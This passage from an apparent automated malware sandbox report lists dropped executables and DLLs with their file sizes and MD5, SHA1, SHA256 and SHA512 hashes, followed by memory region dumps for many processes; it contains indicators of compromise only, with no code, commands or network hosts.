                                          c70b2e62594864b2ef7be7249b5b4de9e2eab2363ec502f1aeca546ede5f8dfe

                                          SHA512

                                          cda6a964da91b53e95c3e0a225c3e4b8f177876bd138aa0ac3a10356097745a87a204261fb26122dfaf5de6f92d9cb833bb1b61d6f509c3726c30f2b72d1af62

                                        • C:\Users\Admin\AppData\Local\Temp\D430.exe

                                          Filesize

                                          182KB

                                          MD5

                                          5b39b8adf91ec8d510b339da808cb4af

                                          SHA1

                                          760a9e3b865453f03de51e6ef66dd711d550b8c0

                                          SHA256

                                          c70b2e62594864b2ef7be7249b5b4de9e2eab2363ec502f1aeca546ede5f8dfe

                                          SHA512

                                          cda6a964da91b53e95c3e0a225c3e4b8f177876bd138aa0ac3a10356097745a87a204261fb26122dfaf5de6f92d9cb833bb1b61d6f509c3726c30f2b72d1af62

                                        • C:\Users\Admin\AppData\Local\Temp\D6E1.dll

                                          Filesize

                                          1.5MB

                                          MD5

                                          8e4a0c607db16c345cfbafbfdc54e75c

                                          SHA1

                                          dea1effd2eb667de38eec154d17f89cc7646231d

                                          SHA256

                                          fee01d5648c40e808abd9672ddb4d70c15df0edfcc6a61afbcbc690cceba6045

                                          SHA512

                                          c998c14cae8d99bb41f7b8d006fd29705ec98cf639a28a7d5bedb0248e8a4f1cb9e96f31d51e29bcf4eebc4ff0b367150887e4e516c9d1937555b24fd879f13f

                                        • C:\Users\Admin\AppData\Local\Temp\D6E1.dll

                                          Filesize

                                          1.5MB

                                          MD5

                                          8e4a0c607db16c345cfbafbfdc54e75c

                                          SHA1

                                          dea1effd2eb667de38eec154d17f89cc7646231d

                                          SHA256

                                          fee01d5648c40e808abd9672ddb4d70c15df0edfcc6a61afbcbc690cceba6045

                                          SHA512

                                          c998c14cae8d99bb41f7b8d006fd29705ec98cf639a28a7d5bedb0248e8a4f1cb9e96f31d51e29bcf4eebc4ff0b367150887e4e516c9d1937555b24fd879f13f

                                        • C:\Users\Admin\AppData\Local\Temp\D6E1.dll

                                          Filesize

                                          1.5MB

                                          MD5

                                          8e4a0c607db16c345cfbafbfdc54e75c

                                          SHA1

                                          dea1effd2eb667de38eec154d17f89cc7646231d

                                          SHA256

                                          fee01d5648c40e808abd9672ddb4d70c15df0edfcc6a61afbcbc690cceba6045

                                          SHA512

                                          c998c14cae8d99bb41f7b8d006fd29705ec98cf639a28a7d5bedb0248e8a4f1cb9e96f31d51e29bcf4eebc4ff0b367150887e4e516c9d1937555b24fd879f13f

                                        • C:\Users\Admin\AppData\Local\Temp\FDC0.exe

                                          Filesize

                                          3.6MB

                                          MD5

                                          9dbeffadf180fe215fc33f0cec75a13b

                                          SHA1

                                          73ddcbcd479ea6d7c5adec487a482989d65517ea

                                          SHA256

                                          da0914b9477057a8f1424f0bf695064d34b609bf54f25c2dfccff3b142301bdc

                                          SHA512

                                          877427bf184f7d22c8cb562cc8800cc50191b19f444bb1c4e06b43d3f4e2ac38670daf0bf4b481d660314fb6193162177f5ca970544776f437757e2672fd0cde

                                        • C:\Users\Admin\AppData\Local\Temp\FDC0.exe

                                          Filesize

                                          3.6MB

                                          MD5

                                          9dbeffadf180fe215fc33f0cec75a13b

                                          SHA1

                                          73ddcbcd479ea6d7c5adec487a482989d65517ea

                                          SHA256

                                          da0914b9477057a8f1424f0bf695064d34b609bf54f25c2dfccff3b142301bdc

                                          SHA512

                                          877427bf184f7d22c8cb562cc8800cc50191b19f444bb1c4e06b43d3f4e2ac38670daf0bf4b481d660314fb6193162177f5ca970544776f437757e2672fd0cde

                                        • C:\Users\Admin\AppData\Local\Temp\tmpB44C.tmp.bat

                                          Filesize

                                          153B

                                          MD5

                                          bd8b8ed84a6f7934b6c80462cfb3d703

                                          SHA1

                                          e98e937524e0745f956cc0fe9c5310925def7982

                                          SHA256

                                          3a359af487fc456d41deb8fcc1ae8d61498c6a511c89c0ab73e52b5a3a6020c5

                                          SHA512

                                          8f92b7ba54d744380ac36fe54c141408bc552038a9d73b03a0e7bf1b4bfb43e54cdc40a805690f54f42432b88d32f9eb6cb262f479fd9ebd26b4831caaea8a6c

                                        • C:\Users\Admin\AppData\Local\b468e8c5-e91f-4cbf-9a9a-0902980db7d8\CFAA.exe

                                          Filesize

                                          729KB

                                          MD5

                                          4128acbedee976974a7f0c08272c33bc

                                          SHA1

                                          26e291a00f439a1c435e0b7c62c8357d87a879dd

                                          SHA256

                                          9a7527a421f977efc383e32c88ec073669f96d2d7381a1d8e36ec80a5a06da02

                                          SHA512

                                          1209c4d20a788b1b006b0d117cf0e194db65c38865ea2f6a4441e19993a207c367a45827f94ee6c743dfd7b4044185934f8d4eb79bfff9cb5c3f3446a4bcb16a

                                        • C:\Users\Admin\AppData\Roaming\CsEKSsCbCSUHsBFKUscCEESFBsSFkFUHCCUBfbUSAHShSSfKSchFBse.exe

                                          Filesize

                                          837KB

                                          MD5

                                          b71f097937ef3e6a757cda055babb005

                                          SHA1

                                          3fb167b8608824592d1707614cce46cfc643dd44

                                          SHA256

                                          917f533b13b2bac659f4a16d03ea4e1b30ee535c57c132b4d4f784fbd2c2a482

                                          SHA512

                                          d0fca6ef77597c68d8bbf671f4929764146be1dbeae2c6f66783be2922df09e9a7b983c603a295c1056b12f6cddf6e22eadea99bfc104266e4dae75b829b43aa

                                        • C:\Users\Admin\AppData\Roaming\CsEKSsCbCSUHsBFKUscCEESFBsSFkFUHCCUBfbUSAHShSSfKSchFBse.exe

                                          Filesize

                                          837KB

                                          MD5

                                          b71f097937ef3e6a757cda055babb005

                                          SHA1

                                          3fb167b8608824592d1707614cce46cfc643dd44

                                          SHA256

                                          917f533b13b2bac659f4a16d03ea4e1b30ee535c57c132b4d4f784fbd2c2a482

                                          SHA512

                                          d0fca6ef77597c68d8bbf671f4929764146be1dbeae2c6f66783be2922df09e9a7b983c603a295c1056b12f6cddf6e22eadea99bfc104266e4dae75b829b43aa

                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

                                          Filesize

                                          9KB

                                          MD5

                                          9ead10c08e72ae41921191f8db39bc16

                                          SHA1

                                          abe3bce01cd34afc88e2c838173f8c2bd0090ae1

                                          SHA256

                                          8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

                                          SHA512

                                          aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

                                          Filesize

                                          9KB

                                          MD5

                                          9ead10c08e72ae41921191f8db39bc16

                                          SHA1

                                          abe3bce01cd34afc88e2c838173f8c2bd0090ae1

                                          SHA256

                                          8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

                                          SHA512

                                          aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

                                        • memory/504-275-0x00007FF856CC0000-0x00007FF857781000-memory.dmp

                                          Filesize

                                          10.8MB

                                        • memory/504-269-0x00007FF856CC0000-0x00007FF857781000-memory.dmp

                                          Filesize

                                          10.8MB

                                        • memory/504-260-0x00007FF856CC0000-0x00007FF857781000-memory.dmp

                                          Filesize

                                          10.8MB

                                        • memory/1660-264-0x0000000000400000-0x0000000000428000-memory.dmp

                                          Filesize

                                          160KB

                                        • memory/2292-163-0x0000000000400000-0x0000000002C53000-memory.dmp

                                          Filesize

                                          40.3MB

                                        • memory/2292-158-0x00000000071D0000-0x0000000007774000-memory.dmp

                                          Filesize

                                          5.6MB

                                        • memory/2292-228-0x0000000002DC9000-0x0000000002DFA000-memory.dmp

                                          Filesize

                                          196KB

                                        • memory/2292-159-0x0000000002CD0000-0x0000000002D0E000-memory.dmp

                                          Filesize

                                          248KB

                                        • memory/2292-226-0x0000000002DC9000-0x0000000002DFA000-memory.dmp

                                          Filesize

                                          196KB

                                        • memory/2292-157-0x0000000002DC9000-0x0000000002DFA000-memory.dmp

                                          Filesize

                                          196KB

                                        • memory/2292-171-0x0000000007AB0000-0x0000000007AC2000-memory.dmp

                                          Filesize

                                          72KB

                                        • memory/2292-230-0x0000000000400000-0x0000000002C53000-memory.dmp

                                          Filesize

                                          40.3MB

                                        • memory/2292-161-0x0000000007800000-0x0000000007892000-memory.dmp

                                          Filesize

                                          584KB

                                        • memory/2292-176-0x0000000007AD0000-0x0000000007B0C000-memory.dmp

                                          Filesize

                                          240KB

                                        • memory/2292-164-0x0000000007B60000-0x0000000008178000-memory.dmp

                                          Filesize

                                          6.1MB

                                        • memory/2292-209-0x00000000083F0000-0x0000000008456000-memory.dmp

                                          Filesize

                                          408KB

                                        • memory/2292-168-0x0000000007980000-0x0000000007A8A000-memory.dmp

                                          Filesize

                                          1.0MB

                                        • memory/2488-221-0x0000000000400000-0x000000000046E000-memory.dmp

                                          Filesize

                                          440KB

                                        • memory/2488-227-0x0000000000400000-0x000000000046E000-memory.dmp

                                          Filesize

                                          440KB

                                        • memory/2488-218-0x0000000000400000-0x000000000046E000-memory.dmp

                                          Filesize

                                          440KB

                                        • memory/2488-216-0x0000000000400000-0x000000000046E000-memory.dmp

                                          Filesize

                                          440KB

                                        • memory/2488-235-0x0000000000400000-0x000000000046E000-memory.dmp

                                          Filesize

                                          440KB

                                        • memory/3060-219-0x0000000000888000-0x00000000008B5000-memory.dmp

                                          Filesize

                                          180KB

                                        • memory/3060-220-0x0000000000810000-0x0000000000869000-memory.dmp

                                          Filesize

                                          356KB

                                        • memory/3484-150-0x0000000002310000-0x000000000242B000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/3484-149-0x0000000002274000-0x0000000002305000-memory.dmp

                                          Filesize

                                          580KB

                                        • memory/3928-251-0x00007FF856CC0000-0x00007FF857781000-memory.dmp

                                          Filesize

                                          10.8MB

                                        • memory/3928-246-0x0000000000140000-0x0000000000260000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/4244-250-0x0000000000A00000-0x0000000000AD6000-memory.dmp

                                          Filesize

                                          856KB

                                        • memory/4244-252-0x00007FF856CC0000-0x00007FF857781000-memory.dmp

                                          Filesize

                                          10.8MB

                                        • memory/4244-256-0x00007FF856CC0000-0x00007FF857781000-memory.dmp

                                          Filesize

                                          10.8MB

                                        • memory/4568-132-0x00000000007FD000-0x000000000080E000-memory.dmp

                                          Filesize

                                          68KB

                                        • memory/4568-133-0x00000000006D0000-0x00000000006D9000-memory.dmp

                                          Filesize

                                          36KB

                                        • memory/4568-134-0x0000000000400000-0x0000000000588000-memory.dmp

                                          Filesize

                                          1.5MB

                                        • memory/4568-135-0x0000000000400000-0x0000000000588000-memory.dmp

                                          Filesize

                                          1.5MB

                                        • memory/5124-304-0x0000000140000000-0x00000001400C6000-memory.dmp

                                          Filesize

                                          792KB

                                        • memory/5124-273-0x0000000140000000-0x00000001400C6000-memory.dmp

                                          Filesize

                                          792KB

                                        • memory/5124-272-0x0000000140000000-0x00000001400C6000-memory.dmp

                                          Filesize

                                          792KB

                                        • memory/5124-270-0x0000000140000000-0x00000001400C6000-memory.dmp

                                          Filesize

                                          792KB

                                        • memory/5124-276-0x0000000140000000-0x00000001400C6000-memory.dmp

                                          Filesize

                                          792KB

                                        • memory/5312-283-0x0000000000400000-0x0000000000BE9000-memory.dmp

                                          Filesize

                                          7.9MB

                                        • memory/5312-282-0x0000000000400000-0x0000000000BE9000-memory.dmp

                                          Filesize

                                          7.9MB

                                        • memory/5312-284-0x0000000000400000-0x0000000000BE9000-memory.dmp

                                          Filesize

                                          7.9MB

                                        • memory/5312-280-0x0000000000400000-0x0000000000BE9000-memory.dmp

                                          Filesize

                                          7.9MB

                                        • memory/5312-291-0x0000000000400000-0x0000000000BE9000-memory.dmp

                                          Filesize

                                          7.9MB

                                        • memory/5312-285-0x0000000000400000-0x0000000000BE9000-memory.dmp

                                          Filesize

                                          7.9MB

                                        • memory/5376-288-0x0000000000940000-0x000000000094B000-memory.dmp

                                          Filesize

                                          44KB

                                        • memory/5376-287-0x0000000000950000-0x0000000000957000-memory.dmp

                                          Filesize

                                          28KB

                                        • memory/5408-294-0x0000000000FD0000-0x0000000000FDF000-memory.dmp

                                          Filesize

                                          60KB

                                        • memory/5408-293-0x0000000000FE0000-0x0000000000FE9000-memory.dmp

                                          Filesize

                                          36KB

                                        • memory/5476-296-0x0000000000E30000-0x0000000000E35000-memory.dmp

                                          Filesize

                                          20KB

                                        • memory/5476-297-0x0000000000E20000-0x0000000000E29000-memory.dmp

                                          Filesize

                                          36KB

                                        • memory/5532-298-0x0000000000190000-0x000000000019C000-memory.dmp

                                          Filesize

                                          48KB

                                        • memory/5532-300-0x00000000001A0000-0x00000000001A6000-memory.dmp

                                          Filesize

                                          24KB

                                        • memory/5564-301-0x0000000000170000-0x0000000000192000-memory.dmp

                                          Filesize

                                          136KB

                                        • memory/5564-302-0x0000000000140000-0x0000000000167000-memory.dmp

                                          Filesize

                                          156KB

                                        • memory/5596-307-0x0000000000900000-0x0000000000909000-memory.dmp

                                          Filesize

                                          36KB

                                        • memory/5596-305-0x0000000000910000-0x0000000000915000-memory.dmp

                                          Filesize

                                          20KB

                                        • memory/11524-189-0x0000000000400000-0x0000000000588000-memory.dmp

                                          Filesize

                                          1.5MB

                                        • memory/11524-172-0x00000000006D0000-0x00000000006D9000-memory.dmp

                                          Filesize

                                          36KB

                                        • memory/11524-174-0x0000000000400000-0x0000000000588000-memory.dmp

                                          Filesize

                                          1.5MB

                                        • memory/11524-170-0x000000000083D000-0x000000000084D000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/25140-191-0x00000000027B0000-0x0000000002877000-memory.dmp

                                          Filesize

                                          796KB

                                        • memory/25140-156-0x0000000002040000-0x00000000021BF000-memory.dmp

                                          Filesize

                                          1.5MB

                                        • memory/25140-177-0x00000000026B0000-0x00000000027A4000-memory.dmp

                                          Filesize

                                          976KB

                                        • memory/25140-180-0x00000000024B0000-0x00000000025A4000-memory.dmp

                                          Filesize

                                          976KB

                                        • memory/25140-194-0x0000000002880000-0x0000000002935000-memory.dmp

                                          Filesize

                                          724KB

                                        • memory/25140-195-0x0000000002880000-0x0000000002935000-memory.dmp

                                          Filesize

                                          724KB

                                        • memory/25140-198-0x00000000026B0000-0x00000000027A4000-memory.dmp

                                          Filesize

                                          976KB

                                        • memory/25492-165-0x0000000000C00000-0x0000000000C75000-memory.dmp

                                          Filesize

                                          468KB

                                        • memory/25492-167-0x0000000000980000-0x00000000009EB000-memory.dmp

                                          Filesize

                                          428KB

                                        • memory/37260-162-0x00000000009D0000-0x00000000009DC000-memory.dmp

                                          Filesize

                                          48KB

                                        • memory/45448-202-0x0000000002351000-0x00000000023E2000-memory.dmp

                                          Filesize

                                          580KB

                                        • memory/45816-210-0x0000000006080000-0x0000000006242000-memory.dmp

                                          Filesize

                                          1.8MB

                                        • memory/45816-169-0x0000000000500000-0x0000000000560000-memory.dmp

                                          Filesize

                                          384KB

                                        • memory/45816-211-0x0000000008430000-0x000000000895C000-memory.dmp

                                          Filesize

                                          5.2MB

                                        • memory/45876-233-0x0000000000400000-0x0000000000537000-memory.dmp

                                          Filesize

                                          1.2MB

                                        • memory/45876-201-0x0000000000400000-0x0000000000537000-memory.dmp

                                          Filesize

                                          1.2MB

                                        • memory/45876-208-0x0000000000400000-0x0000000000537000-memory.dmp

                                          Filesize

                                          1.2MB

                                        • memory/45876-203-0x0000000000400000-0x0000000000537000-memory.dmp

                                          Filesize

                                          1.2MB

                                        • memory/46004-182-0x0000000000400000-0x0000000000537000-memory.dmp

                                          Filesize

                                          1.2MB

                                        • memory/46004-193-0x0000000000400000-0x0000000000537000-memory.dmp

                                          Filesize

                                          1.2MB

                                        • memory/46004-186-0x0000000000400000-0x0000000000537000-memory.dmp

                                          Filesize

                                          1.2MB

                                        • memory/46004-185-0x0000000000400000-0x0000000000537000-memory.dmp

                                          Filesize

                                          1.2MB

                                        • memory/46004-184-0x0000000000400000-0x0000000000537000-memory.dmp

                                          Filesize

                                          1.2MB